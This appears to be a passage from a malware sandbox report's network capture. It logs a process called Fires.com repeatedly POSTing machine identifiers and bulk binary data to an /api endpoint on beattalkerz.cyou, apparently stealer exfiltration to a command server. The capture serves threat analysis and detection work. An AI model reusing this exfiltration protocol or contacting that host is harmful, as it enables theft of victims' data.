eRFNmmtf6mnS/USA355r3lt6zaKTtUGzqvEBP4xfLno5oAkLz6/aPTfpsOSr/mo6v96f09N1EffrhdCrzG+aL41geZuvXzrNlykkQB/+q45KGv2Ck0Vhs/oRYZ98f44aaQS9n/8uHqhTe0VQnz5vv067CcITgdSn6sHxf7wfjhqJMPnbr18bjVd5NcFv/ovuemqdggPVsROuddU/vZtbrguweQlvLi6sI5jQ4D86Hjq6Si1ik5XhQ9rBYZ/cb97
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 50 2f 37 4c 36 75 4d 39 78 6c 31 67 48 75 4e 2b 46 7a 4c 2b 6b 32 6a 45 6c 59 79 77 35 76 52 34 56 36 39 43 35 39 36 4f 59 42 5a 43 70 74 62 66 71 30 6a 66 4d 64 30 53 33 6f 59 53 6c 35 62 47 63 66 6e 52 6f 45 54 43 70 46 41 58 74 6a 4e 4c 34 72 5a 41 63 68 76 2b 37 75 61 79 64 4c 38 51 41 52 50 76 77 2b 37 50 31 2b 34 64 7a 5a 77 70 43 62 4c 68 64 43 72 7a 58 74 62 72 79 32 45 75 46 2f 36 32 35 37 64 35 6c 68 6b 67 48 36 65 4c 38 31 5a 75 48 32 79 41 78 57 67 4a 38 69 52 67 48 2b 34 47 37 6f 71 2f 57 55 36 37 2f 76 62 6d 56 6b 7a 65 4d 44 6c 79 2f 31 4c 6a 6c 71 36 37 4b 4e 33 6c 7a 46 54 69 69 46 41 4f 2b 37 2f 37 32 70 39 5a 46 31 37 6d 31 6f 66 71 54 4e 35 42 66 52 4b 65 78 36 62 44 77 2b 6f 74 32 5a 6b 4a 63 4a 2b 63 46 55 36 53 54 75 36 4b 79 31 6c Data Ascii: P/7L6uM9xl1gHuN+FzL+k2jElYyw5vR4V69C596OYBZCptbfq0jfMd0S3oYSl5bGcfnRoETCpFAXtjNL4rZAchv+7uaydL8QARPvw+7P1+4dzZwpCbLhdCrzXtbry2EuF/6257d5lhkgH6eL81ZuH2yAxWgJ8iRgH+4G7oq/WU67/vbmVkzeMDly/1Ljlq67KN3lzFTiiFAO+7/72p9ZF17m1ofqTN5BfRKex6bDw+ot2ZkJcJ+cFU6STu6Ky1l
2025-01-07 13:51:48 UTC	1369	IN	Data Raw: 37 37 75 64 4f 64 52 42 52 4b 66 59 2b 36 50 6c 6c 70 4a 6d 4c 42 31 4b 66 70 49 51 48 66 4c 47 34 2f 50 74 73 51 57 51 76 75 50 70 76 64 49 34 75 6e 67 6c 76 36 2f 37 37 65 58 78 6a 6d 68 30 57 51 4e 2b 2f 30 4e 42 70 35 53 6d 74 66 44 45 46 4e 6d 6d 74 65 2f 71 68 53 58 61 44 68 61 2f 75 66 75 73 70 72 76 4f 49 44 64 4c 45 58 6d 5a 4c 54 54 79 78 76 54 30 73 4a 73 48 74 72 7a 6b 38 35 54 6a 59 70 64 41 43 76 6a 33 71 71 76 72 36 64 4e 6d 62 47 52 53 64 75 63 73 58 62 7a 5a 74 62 72 67 6f 77 69 5a 73 66 4c 76 75 35 42 51 6d 6b 6b 46 36 66 47 32 35 34 53 71 7a 53 78 30 45 31 49 34 35 30 74 42 73 6f 48 78 38 2b 44 4f 57 38 58 6b 6f 4b 72 39 6a 53 57 4c 41 42 32 2f 39 2f 75 7a 39 2b 65 63 4e 48 51 46 55 6e 6d 6b 41 51 48 36 77 75 50 68 35 36 67 31 73 71 6a Data Ascii: 77udOdRBRKfY+6PllpJmLB1KfpIQHfLG4/PtsQWQvuPpvdI4unglv6/77eXxjmh0WQN+/0NBp5SmtfDEFNmmte/qhSXaDha/ufusprvOIDdLEXmZLTTyxvT0sJsHtrzk85TjYpdACvj3qqvr6dNmbGRSducsXbzZtbrgowiZsfLvu5BQmkkF6fG254SqzSx0E1I450tBsoHx8+DOW8XkoKr9jSWLAB2/9/uz9+ecNHQFUnmkAQH6wuPh56g1sqj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:49 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0UXRM0SIRE6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18119 Host: beattalkerz.cyou
2025-01-07 13:51:49 UTC	15331	OUT	Data Raw: 2d 2d 30 55 58 52 4d 30 53 49 52 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 0d 0a 2d 2d 30 55 58 52 4d 30 53 49 52 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 55 58 52 4d 30 53 49 52 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 30 55 58 52 4d 30 53 49 52 45 36 0d 0a 43 6f 6e 74 65 6e Data Ascii: --0UXRM0SIRE6Content-Disposition: form-data; name="hwid"B49C85093E8B15AC5FEB7783841E180E--0UXRM0SIRE6Content-Disposition: form-data; name="pid"2--0UXRM0SIRE6Content-Disposition: form-data; name="lid"hRjzG3--DNO--0UXRM0SIRE6Conten
2025-01-07 13:51:49 UTC	2788	OUT	Data Raw: e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2025-01-07 13:51:50 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ttog0t6tbumh6ji1u5mpbfcmo0; expires=Sat, 03 May 2025 07:38:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBtXRKmZeG1COYnXTenj9NTIXtCJzE5vs0Mvz1nLU4LJNjJ6ixlVEoxESFFUBmtpzxWeLj%2BTcrxMVyJ%2FJdClBogObFfxz4xs23Pfwrs5zkrtAE7y0IKyoGG6TM%2BCeO68WI9v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46cc02960f799-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1483&rtt_var=588&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19074&delivery_rate=1811414&cwnd=113&unsent_bytes=0&cid=e3606029d952de6e&ts=674&x=0"
2025-01-07 13:51:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 13:51:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:51 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C1RMM1KW6B0TGW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8758 Host: beattalkerz.cyou
2025-01-07 13:51:51 UTC	8758	OUT	Data Raw: 2d 2d 43 31 52 4d 4d 31 4b 57 36 42 30 54 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 0d 0a 2d 2d 43 31 52 4d 4d 31 4b 57 36 42 30 54 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 31 52 4d 4d 31 4b 57 36 42 30 54 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 43 31 52 4d 4d 31 4b 57 36 42 Data Ascii: --C1RMM1KW6B0TGWContent-Disposition: form-data; name="hwid"B49C85093E8B15AC5FEB7783841E180E--C1RMM1KW6B0TGWContent-Disposition: form-data; name="pid"2--C1RMM1KW6B0TGWContent-Disposition: form-data; name="lid"hRjzG3--DNO--C1RMM1KW6B
2025-01-07 13:51:51 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bnd78oult7j4gl2psu631b3h0r; expires=Sat, 03 May 2025 07:38:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5So%2BNkHCr9mNkfGQdcdbU4gdEIJk2P9fDcPImxSmKe6lIxasyMTgvoJCwkhrozAlQCQvNGTOxdpNaie3L8nvqP5JzO5PQMVW%2FKWgwhhUi0qOd1vY%2Ff77Wzmb3j4jwz4huZ9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46cc86fe28c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1967&rtt_var=745&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9693&delivery_rate=1461461&cwnd=236&unsent_bytes=0&cid=f22110de6a08160e&ts=531&x=0"
2025-01-07 13:51:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 13:51:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:52 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F4TSIOJGIPTLWQG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20417 Host: beattalkerz.cyou
2025-01-07 13:51:52 UTC	15331	OUT	Data Raw: 2d 2d 46 34 54 53 49 4f 4a 47 49 50 54 4c 57 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 0d 0a 2d 2d 46 34 54 53 49 4f 4a 47 49 50 54 4c 57 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 34 54 53 49 4f 4a 47 49 50 54 4c 57 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 46 34 54 53 49 4f 4a Data Ascii: --F4TSIOJGIPTLWQGContent-Disposition: form-data; name="hwid"B49C85093E8B15AC5FEB7783841E180E--F4TSIOJGIPTLWQGContent-Disposition: form-data; name="pid"3--F4TSIOJGIPTLWQGContent-Disposition: form-data; name="lid"hRjzG3--DNO--F4TSIOJ
2025-01-07 13:51:52 UTC	5086	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-07 13:51:53 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l152fme402gf7i6oi615g7m49m; expires=Sat, 03 May 2025 07:38:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZVsglIhLBIEbmVcJjtPWbSA5rbFJEwTau9P4wpl6E9bfVeDmhRixgfa1amGeKYFHR7qM%2BlTWF3NUHRHIDt7IRurofmpsmtIFGohez%2B3nv0%2BKNS%2BCg3VAaSEbxfPpyTew2dC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46ccfd80043e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1664&rtt_var=646&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21376&delivery_rate=1664766&cwnd=228&unsent_bytes=0&cid=f30960b2f80e7e36&ts=936&x=0"
2025-01-07 13:51:53 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 13:51:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:53 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NNB4MD4V4YHG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1212 Host: beattalkerz.cyou
2025-01-07 13:51:53 UTC	1212	OUT	Data Raw: 2d 2d 4e 4e 42 34 4d 44 34 56 34 59 48 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 0d 0a 2d 2d 4e 4e 42 34 4d 44 34 56 34 59 48 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4e 42 34 4d 44 34 56 34 59 48 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 4e 4e 42 34 4d 44 34 56 34 59 48 47 0d 0a 43 6f Data Ascii: --NNB4MD4V4YHGContent-Disposition: form-data; name="hwid"B49C85093E8B15AC5FEB7783841E180E--NNB4MD4V4YHGContent-Disposition: form-data; name="pid"1--NNB4MD4V4YHGContent-Disposition: form-data; name="lid"hRjzG3--DNO--NNB4MD4V4YHGCo
2025-01-07 13:51:54 UTC	1132	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jlt2sv7iq27g6af1k2vjd9ub3i; expires=Sat, 03 May 2025 07:38:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FE6LYHIK5GP%2FLw4xnsV5mt9P4%2B8HzKSH%2FHb12q1fNklYzM8RsemSHkhWF5u%2Fx%2BTb9XLdRZqQrHcVCRVKTa4qp5nid%2BuZQflmRClAhgP13Z3XYcMsOL0I55e1i5TFqFPATZr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46cd99d440f3b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1466&rtt_var=575&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2123&delivery_rate=1862244&cwnd=215&unsent_bytes=0&cid=f9d6ef16b2d155f6&ts=460&x=0"
2025-01-07 13:51:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 13:51:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:54 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C01FSJFY8LO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1084 Host: beattalkerz.cyou
2025-01-07 13:51:54 UTC	1084	OUT	Data Raw: 2d 2d 43 30 31 46 53 4a 46 59 38 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 0d 0a 2d 2d 43 30 31 46 53 4a 46 59 38 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 30 31 46 53 4a 46 59 38 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 43 30 31 46 53 4a 46 59 38 4c 4f 0d 0a 43 6f 6e 74 65 6e Data Ascii: --C01FSJFY8LOContent-Disposition: form-data; name="hwid"B49C85093E8B15AC5FEB7783841E180E--C01FSJFY8LOContent-Disposition: form-data; name="pid"1--C01FSJFY8LOContent-Disposition: form-data; name="lid"hRjzG3--DNO--C01FSJFY8LOConten
2025-01-07 13:51:55 UTC	1122	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bt7534muqrnhhacq4aauuic0ed; expires=Sat, 03 May 2025 07:38:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wxRTogIRLryBwB4oV0FA1MAyEE8E61dqre4lyPhH5u7IvZD3PUCMk1Ai67Jx2sM1h3XWCwnhllUTp5lC%2Ft0ngj2LH3IemFIZRreqvN3HMzy2K8v%2Byly3JQOSvv6tT77%2FTabh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46ce02fbf7c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2038&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1994&delivery_rate=1429970&cwnd=207&unsent_bytes=0&cid=78598f3abee995e5&ts=596&x=0"
2025-01-07 13:51:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 13:51:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	104.21.25.52	443	6432	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:51:55 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 112 Host: beattalkerz.cyou
2025-01-07 13:51:55 UTC	112	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 42 34 39 43 38 35 30 39 33 45 38 42 31 35 41 43 35 46 45 42 37 37 38 33 38 34 31 45 31 38 30 45 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=B49C85093E8B15AC5FEB7783841E180E
2025-01-07 13:51:56 UTC	1120	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:51:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vrmheif938969pa0qpbkk316fi; expires=Sat, 03 May 2025 07:38:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsaDXAylsT5bARL4lVbfrDqoqnMNk7Ehj3ufnyTSQ9BdBni5OH4VFcnLyCN8GJwhM4wj1oWDZPIoVUfSyWw7oKhjcK9pMp3rQDY4XW%2BNKK%2BkaBmWsUzSqZnkpgRsXSKupFa0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe46ce69f484345-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1013&delivery_rate=1584373&cwnd=219&unsent_bytes=0&cid=b3701a9365a6c802&ts=741&x=0"
2025-01-07 13:51:56 UTC	218	IN	Data Raw: 64 34 0d 0a 4b 73 35 51 44 37 6e 4d 37 4c 56 32 4e 55 37 72 32 43 39 35 62 70 4a 43 64 35 44 4a 42 73 69 6a 4c 43 56 33 58 64 70 30 4c 6d 74 78 74 58 4a 36 6d 2f 62 4f 33 51 4a 42 50 70 6a 69 63 31 59 79 76 53 45 53 39 37 77 6f 75 38 74 44 56 53 74 79 34 6b 45 5a 58 78 6a 34 59 6a 75 4e 2b 72 43 61 42 6c 31 67 6e 36 42 62 57 30 4b 77 4a 41 4f 79 38 7a 54 6b 67 55 6b 48 54 57 79 6e 57 46 56 4a 58 2b 78 71 4c 64 47 34 6d 4d 55 46 44 78 4c 45 68 41 41 53 41 76 73 79 41 65 57 6b 62 37 76 57 52 51 73 45 4e 62 55 45 63 6b 52 44 6f 43 52 51 32 71 43 63 36 67 56 64 4c 38 57 73 56 77 31 4d 76 6d 41 52 35 4f 73 38 2b 49 38 4f 51 46 56 6e 36 67 6c 7a 0d 0a Data Ascii: 